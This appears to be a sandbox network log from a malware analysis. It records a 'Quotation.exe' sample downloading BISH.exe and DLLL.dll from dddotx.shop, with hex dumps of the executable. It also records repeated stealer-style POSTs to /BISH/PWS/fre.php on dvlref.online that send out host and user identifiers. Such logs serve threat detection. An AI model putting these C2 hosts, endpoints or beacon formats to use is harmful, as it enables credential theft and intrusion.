Dec 2, 2024 14:48:19.524944067 CET	800	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:48:19 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VMo4K574mjZdnjZjRpbGXrjYJSRwc%2FmByUfj3rFs3RL765YY70A85nWus%2Bdyeyu7mHlgoIGXC8Q9sRwOZgivpUt3YmXYJoF%2Ful1XjGixv1WlrlMQZ%2B%2BX58ajCbwOK51l"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc61bab727c94-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2048&min_rtt=2048&rtt_var=1024&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.7	50016	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:48:19.786144972 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:48:19.906174898 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:48:21.192187071 CET	791	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:48:21 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NAA9vJx2cdByg52MxsGCH6UNW7evNFAVsDHvUCHsov1NfSxucUThc8xZVXsol1m9SxW%2Bma5UN5blULNNCySJOPmzE1f86GTyaAKqJTaKXqo0AQ6Uci12dvdfdPXLWs6e"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc625ff95c360-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1624&min_rtt=1624&rtt_var=812&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=136&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.7	50021	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:48:21.546886921 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:48:21.667040110 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:48:22.914364100 CET	793	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:48:22 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xsjfDA2jAQYrL7Uhgt4KjBSYIuV4Tk4loAG93xo1I%2F7tocjsTTmvZ5yJC3FOPme4xJuUaIpGFMV1om7ZjIxzR1lIGlEl23Z1E3A2Nb6UfWN%2F56JQTZVRZShc7l4o6VRI"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc630b9b25e7f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1578&min_rtt=1578&rtt_var=789&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.7	50025	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:48:23.226758003 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:48:23.346751928 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:48:24.582113981 CET	795	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:48:24 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C%2BWcrokjlg1P4VAOINhsL2nUvS7WTsnqI9wlIYxSHX3keN4%2BWKwhNE%2B0JL60KRqHKtlKUEoOUYqdmKfZdJOzj1L9wn2z70mZCeIfSCuRLHKnXAjN7aHk0I9eEAzcRpxN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc63b3a3f7c6f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1810&min_rtt=1810&rtt_var=905&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.7	50031	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:48:24.865756989 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:48:24.985940933 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:48:26.191217899 CET	797	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:48:26 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lWVCD81poYOmQDUVSAcgf%2B2SvP1PQk6W%2FEx0wwiXDXZ8NFumwYXsE6vVgRYqsUPM0xMiIsmJ401qbpILO2c5TyaTSk1Ps2%2BSgtrlbLo%2B9iFkvcnrBsXyuFC3SjgvH42c"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc64539f11885-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1691&min_rtt=1691&rtt_var=845&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.7	50034	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:48:26.459008932 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:48:26.579169035 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:48:27.863046885 CET	799	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:48:27 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9m0VEKAtV074q86NLvh5O21sX%2BwX6Hdy9q670rt6kgfbs7VyBffVPDPXa6io3%2F%2FVjkn5Ah0bOwdVWuSf8S8umR79aD7aRuE7SDEhx0ey8OpsQKKSZmXI9KrzD0i%2Fogy%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc64fac7c42c2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1617&min_rtt=1617&rtt_var=808&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49700	104.21.12.202	443	4828	C:\Users\user\Desktop\Quotation.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 13:46:22 UTC	69	OUT	GET /BISH.exe HTTP/1.1 Host: dddotx.shop Connection: Keep-Alive
2024-12-02 13:46:23 UTC	914	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 13:46:22 GMT Content-Type: application/octet-stream Content-Length: 106496 Connection: close Last-Modified: Wed, 27 Nov 2024 08:31:05 GMT ETag: "1a000-627e0c967eb8e" Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 7077 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u%2Be7VmgPKFpNSi6y4h37vXys47lE%2BvoO3juVidrFG5f6xCgwRmKXRrt3b9R1CL%2Fc3nNNix2wS7fAWdIOexYIBOPS6AOMTDnKR2z0pzd6OcNVq4rgaI6cbzxRZkW47A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc345399fef9d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1808&min_rtt=1800&rtt_var=692&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=683&delivery_rate=1561497&cwnd=99&unsent_bytes=0&cid=daeb2de0de33f980&ts=700&x=0"
2024-12-02 13:46:23 UTC	455	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc cd 78 fe 88 ac 16 ad 88 ac 16 ad 88 ac 16 ad 81 d4 95 ad 89 ac 16 ad 4b a3 4b ad 8a ac 16 ad 8d a0 19 ad 89 ac 16 ad 3d 32 f3 ad 8b ac 16 ad 88 ac 16 ad 8c ac 16 ad 81 d4 83 ad 89 ac 16 ad 88 ac 17 ad c7 ac 16 ad 81 d4 85 ad 99 ac 16 ad 3d 32 f7 ad f3 ac 16 ad 3d 32 c8 ad 89 ac 16 ad 52 69 63 68 88 ac 16 ad 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 85 08 6c 57 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$xKK=2=2=2RichPELlW
2024-12-02 13:46:23 UTC	1369	IN	Data Raw: 00 00 50 01 00 5c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f5 36 01 00 00 10 00 00 00 38 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 60 40 00 00 00 50 01 00 00 42 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 24 5e 08 00 00 a0 01 00 00 02 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 78 00 00 00 00 00 00 00 20 00 00 00 00 0a 00 00 20 00 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: P\.text68 `.rdata`@PB<@@.data$^~@.x
2024-12-02 13:46:23 UTC	1369	IN	Data Raw: c7 90 3a 08 74 4a 4f 40 85 ff 75 f6 83 86 1c 04 00 00 ff 75 1d 8b 86 10 04 00 00 89 86 18 04 00 00 40 c7 86 1c 04 00 00 08 00 00 00 89 86 10 04 00 00 8b 86 18 04 00 00 d0 20 8b 86 10 04 00 00 8a 0a 5f 88 08 ff 86 10 04 00 00 5e 5d c2 08 00 85 ff 74 b8 83 c9 ff 01 8e 1c 04 00 00 8d 69 09 75 19 8b 86 10 04 00 00 89 86 18 04 00 00 40 89 ae 1c 04 00 00 89 86 10 04 00 00 8b 86 18 04 00 00 8a 10 02 d2 fe c2 88 10 01 8e 1c 04 00 00 75 19 8b 86 10 04 00 00 89 86 18 04 00 00 40 89 ae 1c 04 00 00 89 86 10 04 00 00 8b 86 18 04 00 00 8a 10 02 d2 fe c2 88 10 01 8e 1c 04 00 00 75 19 8b 86 10 04 00 00 89 86 18 04 00 00 40 89 ae 1c 04 00 00 89 86 10 04 00 00 8b 86 18 04 00 00 8a 08 02 c9 fe c1 8b d7 23 d5 88 08 52 8b ce e8 d9 fc ff ff 8b c7 83 e0 04 50 8b ce e8 cc fc ff Data Ascii: :tJO@uu@ _^]tiu@u@u@#RP
2024-12-02 13:46:23 UTC	1369	IN	Data Raw: 04 00 00 89 86 10 04 00 00 8b 86 18 04 00 00 d0 20 01 be 1c 04 00 00 75 19 8b 86 10 04 00 00 89 86 18 04 00 00 40 89 ae 1c 04 00 00 89 86 10 04 00 00 8b 86 18 04 00 00 d0 20 8b 54 24 18 52 8b ce e8 d4 f8 ff ff 5f 5e 5d 5b c2 08 00 8b 44 24 04 8d 90 00 68 01 00 3b 91 04 04 00 00 76 19 8b 89 0c 04 00 00 3b c1 76 05 2b c1 c2 04 00 2b c1 05 00 68 01 00 c2 04 00 33 c0 c2 04 00 83 ec 10 53 55 8b 6c 24 20 56 33 db 8b f1 57 89 5c 24 10 89 5c 24 18 39 ae 08 04 00 00 0f 83 a3 00 00 00 eb 0b 8d a4 24 00 00 00 00 8d 64 24 00 8b 86 04 04 00 00 8d 88 00 68 01 00 3b c8 76 17 8b 8e 0c 04 00 00 3b c1 76 04 2b c1 eb 0b 2b c1 05 00 68 01 00 eb 02 33 c0 8b 8e 08 04 00 00 0f b6 11 0f b6 49 01 8b 54 96 04 8b 0c 8a 8b 3e 89 0c 87 8b 86 08 04 00 00 0f b6 10 0f b6 40 01 8b 4c 96 Data Ascii: u@ T$R_^][D$h;v;v++h3SUl$ V3W\$\$9$d$h;v;v++h3IT>@L
2024-12-02 13:46:23 UTC	1369	IN	Data Raw: 3d 00 05 00 00 7c 09 83 ff 02 0f 84 09 03 00 00 3d 00 7d 00 00 7c 09 83 ff 03 0f 84 f9 02 00 00 8b 5c 24 58 8b 44 24 54 8b 96 14 04 00 00 2b c3 89 44 24 20 48 50 8d 4b 01 51 42 52 8d 44 24 4c 50 8b ce e8 dc fa ff ff 8b 4c 24 28 39 4c 24 40 8d 43 01 89 44 24 1c 55 7c 39 8b d1 52 8b ce e8 44 f7 ff ff 8b 4c 24 40 89 44 24 24 8b 44 24 44 50 51 8b ce e8 2f f7 ff ff 8b 4c 24 24 2b c8 03 c9 b8 39 8e e3 38 f7 e9 d1 fa 8b c2 c1 e8 1f 03 c2 eb 30 8b 4c 24 2c 51 8b ce e8 09 f7 ff ff 8b 54 24 44 8b d8 8b 44 24 40 52 50 8b ce e8 f6 f6 ff ff 2b d8 8b c3 8b 5c 24 58 99 83 e2 03 03 c2 c1 f8 02 03 44 24 44 3b e8 7d 08 c7 44 24 14 01 00 00 00 85 ff 76 38 39 6c 24 44 7c 30 8b 4c 24 28 55 51 8b ce e8 be f6 ff ff 8b 54 24 44 8b d8 8b 44 24 40 52 50 8b ce e8 ab f6 ff ff 3b c3 Data Ascii: =\|=}\|\$XD$T+D$ HPKQBRD$LPL$(9L$@CD$U\|9RDL$@D$$D$DPQ/L$$+980L$,QT$DD$@RP+\$XD$D;}D$v89l$D\|0L$(UQT$DD$@RP;
2024-12-02 13:46:23 UTC	1369	IN	Data Raw: eb 0f 8b 86 14 04 00 00 53 50 8b ce e8 b6 ef ff ff ff 86 14 04 00 00 85 ff 0f 84 eb 00 00 00 3b 7c 24 3c 0f 85 e1 00 00 00 8b 54 24 54 8b cf 2b cb 8d 04 0a 3b c7 76 02 8b c7 50 8b 44 24 14 8b eb 2b ef 55 50 8d 4c 24 3c 51 8b ce 89 6c 24 24 e8 76 f5 ff ff 39 7c 24 34 72 34 8b 54 24 30 57 52 8b ce e8 e7 f1 ff ff 8b e8 8b 44 24 38 57 50 8b ce e8 d8 f1 ff ff 3b c5 8b 6c 24 14 7e 10 8b 4c 24 30 8b 54 24 34 89 4c 24 38 89 54 24 3c 8b 44 24 10 57 55 50 8b ce e8 d1 ee ff ff 8b 4c 24 38 57 51 8b ce 8b e8 e8 a3 f1 ff ff 3b c5 7d 3a 8b 44 24 38 3b 86 24 04 00 00 75 09 83 be 28 04 00 00 00 74 18 3d 00 05 00 00 7c 05 83 ff 02 74 19 3d 00 7d 00 00 7c 05 83 ff 03 74 0d 57 50 8b ce e8 eb f1 ff ff 33 ff eb 20 8b 6c 24 10 05 00 00 00 00 8b d3 2b d7 52 55 8b ce e8 c7 ee ff Data Ascii: SP;\|$<T$T+;vPD$+UPL$<Ql$$v9\|$4r4T$0WRD$8WP;l$~L$0T$4L$8T$<D$WUPL$8WQ;}:D$8;$u(t=\|t=}\|tWP3 l$+RU
2024-12-02 13:46:23 UTC	1369	IN	Data Raw: 75 63 b9 01 00 00 00 00 d2 75 12 83 6c 24 04 01 0f 82 24 01 00 00 8a 16 46 00 d2 fe c2 11 c9 0f 82 15 01 00 00 00 d2 75 12 83 6c 24 04 01 0f 82 06 01 00 00 8a 16 46 00 d2 fe c2 72 ca 51 8b 4c 24 3c 2b 4c 24 04 39 cd 59 0f 87 eb 00 00 00 29 0c 24 0f 82 e2 00 00 00 56 89 fe 29 ee f3 a4 5e e9 79 fe ff ff 48 a9 00 00 00 ff 0f 85 c9 00 00 00 c1 e0 08 83 6c 24 04 01 0f 82 bb 00 00 00 8a 06 46 89 c5 b9 01 00 00 00 00 d2 75 12 83 6c 24 04 01 0f 82 a2 00 00 00 8a 16 46 00 d2 fe c2 11 c9 0f 82 93 00 00 00 00 d2 75 12 83 6c 24 04 01 0f 82 84 00 00 00 8a 16 46 00 d2 fe c2 72 ca 3d 00 7d 00 00 83 d9 ff 3d 00 05 00 00 83 d9 ff 3d 80 00 00 00 83 d1 00 3d 80 00 00 00 83 d1 00 51 8b 4c 24 3c 2b 4c 24 04 39 c8 59 77 4d 29 0c 24 72 48 56 89 fe 29 c6 f3 a4 5e e9 df fd ff ff Data Ascii: ucul$$Ful$FrQL$<+L$9Y)$V)^yHl$Ful$Ful$Fr=}===QL$<+L$9YwM)$rHV)^
2024-12-02 13:46:23 UTC	1369	IN	Data Raw: 5e 6a 6c 66 89 85 fa fe ff ff 8d bd 08 ff ff ff 58 6a 6d 66 89 85 fe fe ff ff 58 6a 6f 66 89 85 00 ff ff ff 58 6a 6e 66 89 85 02 ff ff ff 58 66 89 85 04 ff ff ff 33 c0 66 89 85 06 ff ff ff 6a 45 66 89 b5 fc fe ff ff ab ab ab 58 6a 41 66 89 85 16 ff ff ff 66 89 95 18 ff ff ff 5a 6a 50 58 6a 49 66 89 85 1c ff ff ff 58 6a 33 66 89 85 1e ff ff ff 58 6a 32 5f 6a 53 66 89 85 20 ff ff ff 33 c0 21 85 26 ff ff ff 21 85 2a ff ff ff 66 89 8d 14 ff ff ff 59 6a 5f 66 89 85 24 ff ff ff 58 66 89 85 34 ff ff ff 6a 33 58 66 89 85 36 ff ff ff 33 c0 66 89 bd 22 ff ff ff 66 89 bd 32 ff ff ff 66 89 bd 38 ff ff ff 8d bd 3c ff ff ff 66 89 85 3a ff ff ff 66 89 95 1a ff ff ff 66 89 9d 2e ff ff ff 66 89 8d 30 ff ff ff ab 6a 75 ab ab 58 6a 73 66 89 85 48 ff ff ff 58 66 89 85 4a ff Data Ascii: ^jlfXjmfXjofXjnfXf3fjEfXjAffZjPXjIfXj3fXj2_jSf 3!&!*fYj_f$Xf4j3Xf63f"f2f8<f:ff.f0juXjsfHXfJ
2024-12-02 13:46:23 UTC	1369	IN	Data Raw: 66 8b 06 74 0e 66 3b 44 4d c8 75 0e 66 8b 44 4d 90 eb 13 66 3b 44 4d 90 74 07 41 3b cf 72 dd eb 08 66 8b 44 4d c8 66 89 06 83 c6 02 4a 75 c7 5f 5e 8b e5 5d c3 55 8b ec 8b 4d 10 85 c9 74 0e 8b 55 08 8a 02 42 3a 45 0c 74 07 49 75 f5 33 c0 5d c3 8d 42 ff 5d c3 55 8b ec 8b 4d 10 85 c9 74 1b 8b 45 0c 0f b7 d0 8b c2 c1 e2 10 57 8b 7d 08 0b c2 d1 e9 f3 ab 13 c9 66 f3 ab 5f 8b 45 08 5d c3 55 8b ec 8b 45 10 03 c0 50 ff 75 0c ff 75 08 e8 61 f7 ff ff 83 c4 0c 5d c3 55 8b ec 8b 45 08 66 8b 55 0c 0f b7 08 66 3b ca 74 17 66 85 c9 74 0b 83 c0 02 0f b7 08 66 3b ca 75 f0 66 39 10 74 02 33 c0 5d c3 55 8b ec 83 ec 20 33 c0 56 8b 75 0c 57 6a 08 59 8d 7d e0 f3 ab 53 8a 1e b0 01 0f be cb 8b d1 83 e1 07 c1 fa 03 d2 e0 08 44 15 e0 46 84 db 75 e6 83 7d 08 00 8b 35 28 a0 41 00 0f Data Ascii: ftf;DMufDMf;DMtA;rfDMfJu_^]UMtUB:EtIu3]B]UMtEW}f_E]UEPuua]UEfUf;tftf;uf9t3]U 3VuWjY}SDFu}5(A
2024-12-02 13:46:23 UTC	1369	IN	Data Raw: 68 d1 07 41 d3 6a 09 e8 4a f9 ff ff 68 00 00 00 f0 6a 01 56 56 8d 4d f8 51 ff d0 85 c0 0f 84 84 00 00 00 8b 75 f8 6a 00 6a 00 68 f3 a6 b0 ed 6a 09 e8 20 f9 ff ff 8d 4d fc 51 6a 00 6a 00 68 03 80 00 00 56 ff d0 85 c0 74 51 6a 00 53 ff 75 08 ff 75 fc e8 7f fd ff ff 83 c4 10 85 c0 74 3c 8b 75 fc 6a 00 6a 00 68 fd db a8 fe 6a 09 e8 e4 f8 ff ff 6a 00 8d 4d f4 51 57 6a 02 56 ff d0 85 c0 74 19 ff 75 fc e8 16 fd ff ff 6a 00 ff 75 f8 e8 26 fd ff ff 83 c4 0c 8b c7 eb 0e 6a 00 ff 75 f8 e8 15 fd ff ff 59 59 33 c0 5f 5e 5b 8b e5 5d c3 55 8b ec 56 57 ff 75 0c 33 ff ff 75 08 e8 f2 fe ff ff 8b f0 59 59 85 f6 74 13 6a 10 56 e8 8e 01 00 00 56 8b f8 e8 42 f2 ff ff 83 c4 0c 8b c7 5f 5e 5d c3 55 8b ec 83 ec 0c 53 56 57 33 db be d1 07 41 d3 53 53 56 6a 09 e8 59 f8 ff ff 6a 10 Data Ascii: hAjJhjVVMQujjhj MQjjhVtQjSuut<ujjhjjMQWjVtuju&juYY3_^[]UVWu3uYYtjVVB_^]USVW3ASSVjYj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49701	104.21.12.202	443	4828	C:\Users\user\Desktop\Quotation.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 13:46:25 UTC	45	OUT	GET /DLLL.dll HTTP/1.1 Host: dddotx.shop
2024-12-02 13:46:25 UTC	880	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 13:46:25 GMT Content-Type: application/octet-stream Content-Length: 15360 Connection: close Last-Modified: Wed, 27 Nov 2024 08:31:05 GMT ETag: "3c00-627e0c968705e" Accept-Ranges: bytes CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hp5MO1cAmPok5f6WLy2Ucvo0Sy%2FyjwKpiQonJPRL6IbUQ3YYJ1Q9hXO4sY%2FogEvERmqQ%2Fe9B5ohODxD5EIcX5Pe7WPlGmHRPisrxpMAi%2FE0rE2J%2FSdOtfslTSggfEw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc3541b430f79-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1703&min_rtt=1699&rtt_var=645&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=683&delivery_rate=1684939&cwnd=241&unsent_bytes=0&cid=eb27f4c381ed6908&ts=636&x=0"
